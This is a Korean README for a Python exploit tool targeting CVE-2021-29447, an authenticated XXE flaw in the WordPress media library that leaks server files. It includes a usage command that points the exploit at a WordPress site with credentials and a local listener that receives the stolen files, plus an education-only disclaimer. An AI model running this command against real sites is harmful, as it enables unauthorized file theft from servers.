
WordPress 미디어 라이브러리의 XML External Entity Injection (XXE)을 악용하여 파일을 유출합니다.
워드프레스 미디어 라이브러리 XML 인증된 외부 엔티티 주입(XXE)을 익스플로잇하여 파일을 유출합니다.
워드프레스 5.7.1에서 패치되었습니다.
미디어 라이브러리와 상호작용하려면 유효한 워드프레스 자격 증명이 필요합니다.
python3 wordpress-cve-2021-29447.py -l http://LOCAL_IP:PORT -r http://WORDPRESS_URL -u USERNAME -p PASSWORD
스크립트는 파일 경로를 묻고 요청한 파일을 반환합니다.
David Utón (M3n0sD0n4ld) ExploitDB 스크립트에서 영감을 받았습니다.
사전 상호 동의 없이 대상을 공격하는 용도로 사용하는 것은 불법입니다. 모든 관련 지역, 주 및 연방법을 준수하는 것은 최종 사용자의 책임입니다. 개발자는 이 프로그램으로 인한 오용이나 손해에 대해 어떠한 책임도 지지 않습니다. 교육 목적으로만 사용하십시오.
이 스크립트는 MIT 라이선스에 따라 배포됩니다.